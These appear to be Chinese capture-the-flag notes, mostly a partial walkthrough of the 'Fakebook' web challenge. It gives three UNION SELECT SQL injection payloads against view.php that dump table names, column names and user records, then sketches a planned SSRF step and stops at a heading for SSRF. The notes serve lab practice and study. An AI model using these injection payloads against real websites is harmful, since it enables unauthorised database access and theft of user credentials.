# [CISCN2019 华北赛区 Day2 Web1] Hack World
# 盲注:脚本
# [网鼎杯 2018] Fakebook
先用 dirsearch 扫一遍,有一个 robots.txt,里面有个文件,直接打开下载源码,发现
先注册吧,注册进去有个超链接的名字点进去
有参数可以注入,sql 注入,发现是数字型,且在第二个数字这里有回显,直接可以注入,找表,列,以及数据
/view.php?no=0 union//select 1,group_concat (table_name),3,4 from information_schema.tables where table_schema=’fakebook’–+ 得到表名
user/view.php?no=0 union//select 1,group_concat (column_name),3,4 from information_schema.columns where table_schema=’fakebook’ and table_name=’users’–+ 得到列名
/view.php?no=0 union/**/select 1,group_concat (no,username,passwd,data),3,4 from fakebook.users –+ 得到数据
发现数据中有个序列化的数据
与下载文件重合 name,blog,age 这三个都是那个文件的参数,这里我们并没有得到 flag,而是我们个人资料的反序列化数据,因为在数据中存在我们的博客地址,所以我们尝试使用 ssrf 读取 flag,但是我们并不知道 flag 所在文件夹,用 dirsearch 扫描发现 flag.php 和 robots.txt
知识点:ssrf 漏洞: